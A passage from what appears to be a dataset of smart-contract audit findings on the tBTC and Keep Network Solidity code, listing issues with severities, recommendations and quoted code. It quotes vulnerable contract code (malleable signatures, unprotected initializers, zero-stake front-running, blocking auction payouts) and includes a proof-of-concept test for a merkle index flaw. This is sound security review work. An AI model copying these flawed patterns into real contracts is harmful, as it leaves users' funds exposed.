If no users watching malleate the signature, the redemption process will likely enter a fee increase loop, incurring a cost on the deposit owner.чEnsure the passed-in s value is restricted to the lower half of the secp256k1 curve, as done in BondedECDSAKeep:\\n```\\n// Validate `s` value for a malleability concern described in EIP-2.\\n// Only signatures with `s` value in the lower half of the secp256k1\\n// curve's order are considered valid.\\nrequire(\\n uint256(\\_s) <=\\n 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0,\\n \"Malleable signature - s should be in the low half of secp256k1 curve's order\"\\n);\\n```\\nчч```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), \"Not currently awaiting a signature\");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n \"Invalid signature\"\\n );\\n```\\n -Consistent use of SafeERC20 for external tokensчmediumчUse `SafeERC20` features to interact with potentially broken tokens used in the system. E.g. 
`TokenGrant.receiveApproval()` is using `safeTransferFrom` while other contracts aren't.\\n`TokenGrant.receiveApproval` using `safeTransferFrom`\\n```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n\\n`TokenStaking.receiveApproval` not using `safeTransferFrom` while `safeTransfer` is being used.\\n```\\ntoken.transferFrom(\\_from, address(this), \\_value);\\n```\\n\\n```\\ntoken.safeTransfer(owner, amount);\\n```\\n\\n```\\ntoken.transfer(tattletale, tattletaleReward);\\n```\\n\\n`distributeERC20ToMembers` not using `safeTransferFrom`\\n```\\ntoken.transferFrom(\\n msg.sender,\\n tokenStaking.magpieOf(members[i]),\\n dividend\\n);\\n```\\nчConsistently use `SafeERC20` to support potentially broken tokens external to the system.чч```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n -Initialize implementations for proxy contracts and protect initialization methodsчmediumчIt should be avoided that the implementation for proxy contracts can be initialized by third parties. This can be the case if the `initialize` function is unprotected. Since the implementation contract is not meant to be used directly without a proxy delegate-calling it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nChanging the proxies implementation (upgradeTo()) to a version that does not protect the initialization method may allow someone to front-run and initialize the contract if it is not done within the same transaction.\\n`KeepVendor` delegates to `KeepVendorImplV1`. 
The implementations initialization method is unprotected.\\n```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), \"Contract is already initialized.\");\\n \\_initialized[\"BondedECDSAKeepVendorImplV1\"] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n\\n`KeepRandomBeaconServiceImplV1` and `KeepRandomBeaconServiceUpgradeExample`\\n```\\nfunction initialize(\\n uint256 priceFeedEstimate,\\n uint256 fluctuationMargin,\\n uint256 dkgContributionMargin,\\n uint256 withdrawalDelay,\\n address registry\\n)\\n public\\n{\\n require(!initialized(), \"Contract is already initialized.\");\\n \\_initialized[\"KeepRandomBeaconServiceImplV1\"] = true;\\n \\_priceFeedEstimate = priceFeedEstimate;\\n \\_fluctuationMargin = fluctuationMargin;\\n \\_dkgContributionMargin = dkgContributionMargin;\\n \\_withdrawalDelay = withdrawalDelay;\\n \\_pendingWithdrawal = 0;\\n \\_previousEntry = \\_beaconSeed;\\n \\_registry = registry;\\n \\_baseCallbackGas = 18845;\\n}\\n```\\n\\n`Deposit` is deployed via `cloneFactory` delegating to a `masterDepositAddress` in `DepositFactory`. The `masterDepositAddress` (Deposit) might be left uninitialized.\\n```\\ncontract DepositFactoryAuthority {\\n\\n bool internal \\_initialized = false;\\n address internal \\_depositFactory;\\n\\n /// @notice Set the address of the System contract on contract initialization\\n function initialize(address \\_factory) public {\\n require(! \\_initialized, \"Factory can only be initialized once.\");\\n\\n \\_depositFactory = \\_factory;\\n \\_initialized = true;\\n }\\n```\\nчInitialize unprotected implementation contracts in the implementation's constructor. 
Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.чч```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), \"Contract is already initialized.\");\\n \\_initialized[\"BondedECDSAKeepVendorImplV1\"] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n -keep-tecdsa - If caller sends more than is contained in the signer subsidy pool, the value is burnedчmediumчThe signer subsidy pool in `BondedECDSAKeepFactory` tracks funds sent to the contract. Each time a keep is opened, the subsidy pool is intended to be distributed to the members of the new keep:\\n```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n\\nThe tracking around subsidy pool increases is inconsistent, and can lead to sent value being burned. In the case that `subsidyPool` contains less Ether than is sent in `msg.value`, `msg.value` is unused and remains in the contract. 
It may or may not be added to `subsidyPool`, depending on the return status of the random beacon:\\n```\\n(bool success, ) = address(randomBeacon).call.gas(400000).value(msg.value)(\\n abi.encodeWithSignature(\\n \"requestRelayEntry(address,string,uint256)\",\\n address(this),\\n \"setGroupSelectionSeed(uint256)\",\\n callbackGas\\n )\\n);\\nif (!success) {\\n subsidyPool += msg.value; // beacon is busy\\n}\\n```\\nчRather than tracking the `subsidyPool` individually, simply distribute `this.balance` to each new keep's members.чч```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n -keep-core - TokenGrant and TokenStaking allow staking zero amount of tokens and front-runningчmediumчTokens are staked via the callback `receiveApproval()` which is normally invoked when calling `approveAndCall()`. The method is not restricting who can initiate the staking of tokens and relies on the fact that the token transfer to the `TokenStaking` contract is pre-approved by the owner, otherwise, the call would revert.\\nHowever, `receiveApproval()` allows the staking of a zero amount of tokens. The only check performed on the number of tokens transferred is, that the token holders balance covers the amount to be transferred. This check is both relatively weak - having enough balance does not imply that tokens are approved for transfer - and does not cover the fact that someone can call the method with a zero amount of tokens.\\nThis way someone could create an arbitrary number of operators staking no tokens at all. 
This passes the token balance check, `token.transferFrom()` will succeed and an operator struct with a zero stake and arbitrary values for `operator, from, magpie, authorizer` can be set. Finally, an event is emitted for a zero stake.\\nAn attacker could front-run calls to `receiveApproval` to block staking of a legitimate operator by creating a zero stake entry for the operator before she is able to. This vector might allow someone to permanently inconvenience an operator's address. To recover from this situation one could be forced to `cancelStake` terminating the zero stake struct in order to call the contract with the correct stake again.\\nThe same issue exists for `TokenGrant`.\\n```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. 
This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, \"Token contract must be the same one linked to this contract.\");\\n require(\\_value <= token.balanceOf(\\_from), \"Sender must have enough tokens.\");\\n require(\\_extraData.length == 60, \"Stake delegation data must be provided.\");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = \\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), \"Operator address is already in use.\");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\nчRequire tokens to be staked and explicitly disallow the zero amount of tokens case. The balance check can be removed.\\nNote: Consider checking the calls return value or calling the contract via `SafeERC20` to support potentially broken tokens that do not revert in error cases (token.transferFrom).чч```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. 
This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, \"Token contract must be the same one linked to this contract.\");\\n require(\\_value <= token.balanceOf(\\_from), \"Sender must have enough tokens.\");\\n require(\\_extraData.length == 60, \"Stake delegation data must be provided.\");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = \\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), \"Operator address is already in use.\");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\n -tbtc - Inconsistency between increaseRedemptionFee and provideRedemptionProof may create un-provable redemptionsчmediumч`DepositRedemption.increaseRedemptionFee` is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = 
DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, \"Not an allowed fee step\");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`. Over a 24-hour period, `increaseRedemptionFee` could be called 6 times, increasing the fee to `initialRedemptionFee * 6`.\\nEventually, it is expected that a transaction will be submitted and mined. At this point, anyone can call `DepositRedemption.provideRedemptionProof`, finalizing the redemption process and rewarding the signers. However, `provideRedemptionProof` will fail if the transaction fee is too high:\\n```\\nrequire((\\_d.utxoSize().sub(\\_fundingOutputValue)) <= \\_d.initialRedemptionFee \\* 5, \"Fee unexpectedly very high\");\\n```\\n\\nIn the case that `increaseRedemptionFee` is called 6 times and the signers provide a signature for this transaction, the transaction can be submitted and mined but `provideRedemptionProof` for this will always fail. 
Eventually, a redemption proof timeout will trigger the deposit into liquidation and the signers will be punished.чBecause it is difficult to say with certainty that a 5x fee increase will always ensure a transaction's redeemability, the upper bound on fee bumps should be removed from `provideRedemptionProof`.\\nThis should be implemented in tandem with https://github.com/ConsenSys/thesis-tbtc-audit-2020-01/issues/38, so that signers cannot provide a proof that bypasses `increaseRedemptionFee` flow to spend the highest fee possible.чч```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n -keep-tecdsa - keep cannot be closed if a members bond was seized or fully reassignedчmediumчA keep cannot be closed if the bonds have been completely reassigned or seized before, leaving at least one member with zero `lockedBonds`. In this case `closeKeep()` will throw in `freeMembersBonds()` because the requirement in `keepBonding.freeBond` is not satisfied anymore (lockedBonds[bondID] > 0). As a result of this, none of the potentially remaining bonds (reassign) are freed, the keep stays active even though it should be closed.\\n```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. 
Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n \"Requested signing has not timed out yet\"\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n\\n```\\n/// @notice Releases the bond and moves the bond value to the operator's\\n/// unbounded value pool.\\n/// @dev Function requires that caller is the holder of the bond which is\\n/// being released.\\n/// @param operator Address of the bonded operator.\\n/// @param referenceID Reference ID of the bond.\\nfunction freeBond(address operator, uint256 referenceID) public {\\n address holder = msg.sender;\\n bytes32 bondID = keccak256(\\n abi.encodePacked(operator, holder, referenceID)\\n );\\n\\n require(lockedBonds[bondID] > 0, \"Bond not found\");\\n\\n uint256 amount = lockedBonds[bondID];\\n lockedBonds[bondID] = 0;\\n unbondedValue[operator] = amount;\\n}\\n```\\nчMake sure the keep can be set to an end-state (closed/inactive) indicating its end-of-life even if the bond has been seized before. Avoid throwing an exception when freeing member bonds to avoid blocking the unlocking of bonds.чч```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. 
Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n \"Requested signing has not timed out yet\"\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n -tbtc - provideFundingECDSAFraudProof attempts to burn non-existent fundsчmediumчThe funding flow was recently changed from requiring the funder to provide a bond that stays in the Deposit contract to forwarding the funds to the keep, paying for the keep setup.\\nSo at a high level, the funding bond was designed to ensure that funders had some minimum skin in the game, so that DoSing signers/the system was expensive. The upside was that we could refund it in happy paths. Now that we've realized that opening the keep itself will cost enough to prevent DoS, the concept of refunding goes away entirely. 
We definitely missed cleaning up the funder handling in provideFundingECDSAFraudProof though.\\n```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\nчRemove the line that attempts to punish the funder by burning the Deposit contract balance which is zero due to recent changes in how the payment provided with createNewDeposit is handled.чч```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\n -bitcoin-spv - Bitcoin output script length is not checked in wpkhSpendSighash Won't Fixчmediumч`CheckBitcoinSigs.wpkhSpendSighash` calculates the sighash of a Bitcoin transaction. 
Among its parameters, it accepts `bytes memory _outpoint`, which is a 36-byte UTXO id consisting of a 32-byte transaction hash and a 4-byte output index.\\nThe function in question should not accept an `_outpoint` that is not 36-bytes, but no length check is made:\\n```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n hex\"1976a914\", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex\"88ac\"); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex\"01000000\", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex\"8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9\", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex\"00000000\", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex\"00000000\", // nLockTime\\n hex\"01000000\" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\nчCheck that `_outpoint.length` is 36.чч```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n 
hex\"1976a914\", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex\"88ac\"); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex\"01000000\", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex\"8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9\", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex\"00000000\", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex\"00000000\", // nLockTime\\n hex\"01000000\" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\n -tbtc - liquidationInitiator can block purchaseSignerBondsAtAuction indefinitelyчmediumчWhen reporting a fraudulent proof the deposits `liquidationInitiator` is set to the entity reporting and proofing the fraud. The deposit that is in a `*_liquidation_in_progress` state can be bought by anyone at an auction calling `purchaseSignerBondsAtAuction`.\\nInstead of receiving a share of the funds the `liquidationInitiator` can decide to intentionally reject the funds by raising an exception causing `initiator.transfer(contractEthBalance)` to throw, blocking the auction and forcing the liquidation to fail. The deposit will stay in one of the `*_liquidation_in_progress` states.\\n```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. 
the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), \"No active auction\");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, \"Not enough TBTC to cover outstanding debt\");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. 
if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\nчUse a pull vs push funds pattern or use `address.send` instead of `address.transfer` which might leave some funds locked in the contract if it fails.чч```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), \"No active auction\");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. 
If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, \"Not enough TBTC to cover outstanding debt\");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n -bitcoin-spv - verifyHash256Merkle allows existence proofs for the same leaf in multiple locations in the tree Won't Fixчmediumч`BTCUtils.verifyHash256Merkle` is used by `ValidateSPV.prove` to validate a transaction's existence in a Bitcoin block. The function accepts as input a `_proof` and an `_index`. 
The `_proof` consists of, in order: the transaction hash, a list of intermediate nodes, and the merkle root.\\nThe proof is performed iteratively, and uses the `_index` to determine whether the next proof element represents a “left branch” or a “right branch:”\\n```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx >> 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n\\nIf `_idx` is even, the computed hash is placed before the next proof element. If `_idx` is odd, the computed hash is placed after the next proof element. After each iteration, `_idx` is decremented by `_idx /= 2`.\\nBecause `verifyHash256Merkle` makes no requirements on the size of `_proof` relative to `_index`, it is possible to pass in invalid values for `_index` that prove a transaction's existence in multiple locations in the tree.\\nBy modifying existing tests, we showed that any transaction can be proven to exist at least one alternate index. This alternate index is calculated as `(2 ** treeHeight) + prevIndex` - though other alternate indices are possible. 
The modified test is below:\\n```\\nit('verifies a bitcoin merkle root', async () => {\\n for (let i = 0; i < verifyHash256Merkle.length; i += 1) {\\n const res = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n verifyHash256Merkle[i].input.index\\n ); // 0-indexed\\n assert.strictEqual(res, verifyHash256Merkle[i].output);\\n\\n // Now, attempt to use the same proof to verify the same leaf at\\n // a different index in the tree:\\n let pLen = verifyHash256Merkle[i].input.proof.length;\\n let height = ((pLen - 2) / 64) - 2;\\n\\n // Only attempt to verify roots that are meant to be verified\\n if (verifyHash256Merkle[i].output && height >= 1) {\\n let altIdx = (2 ** height) + verifyHash256Merkle[i].input.index;\\n\\n const resNext = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n altIdx\\n );\\n\\n assert.strictEqual(resNext, verifyHash256Merkle[i].output);\\n\\n console.log('Verified transaction twice!');\\n }\\n }\\n});\\n```\\nчUse the length of `_proof` to determine the maximum allowed `_index`. 
`_index` should satisfy the following criterion: `_index` < 2 ** (_proof.length.div(32) - 2).\\nNote that subtraction by 2 accounts for the transaction hash and merkle root, which are assumed to be encoded in the proof along with the intermediate nodes.чч```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx >> 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n -keep-core - stake operator should not be eligible if undelegatedAt is setчlowчAn operator's stake should not be eligible if they stake an amount and immediately call `undelegate` in an attempt to indicate that they are going to recover their stake soon.\\n```\\nbool notUndelegated = block.number <= operator.undelegatedAt || operator.undelegatedAt == 0;\\n\\nif (isAuthorized && isActive && notUndelegated) {\\n balance = operator.amount;\\n}\\n```\\nчA stake that is entering undelegation is indicated by `operator.undelegatedAt` being non-zero. 
Change the `notUndelegated` check block.number <= `operator.undelegatedAt` || `operator.undelegatedAt` == 0 to `operator.undelegatedAt == 0` as any value being set indicates that undelegation is in progress.\\nEnforce that within the initialization period stake is canceled instead of being undelegated.чч```\\nbool notUndelegated = block.number <= operator.undelegatedAt || operator.undelegatedAt == 0;\\n\\nif (isAuthorized && isActive && notUndelegated) {\\n balance = operator.amount;\\n}\\n```\\n -keep-core - Specification inconsistency: TokenStaking amount to be slashed/seizedчlowчThe keep specification states that `slash` and `seize` affect at least the amount specified or the remaining stake of a member.\\nSlash each operator in the list misbehavers by the specified amount (or their remaining stake, whichever is lower).\\nPunish each operator in the list misbehavers by the specified amount or their remaining stake.\\nThe implementation, however, bails if one of the accounts does not have enough stake to be slashed or seized because of the use of `SafeMath.sub()`. This behavior is inconsistent with the specification which states that `min(amount, misbehaver.stake)` stake should be affected. The call to slash/seize will revert and no stakes are affected. At max, the staked amount of the lowest staker can be slashed/seized from every staker.\\nImplementing this method as stated in the specification using `min(amount, misbehaver.stake)` will cover the fact that slashing/seizing was only partially successful. 
If `misbehaver.stake` is zero no error might be emitted even though no stake was slashed/seized.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. 
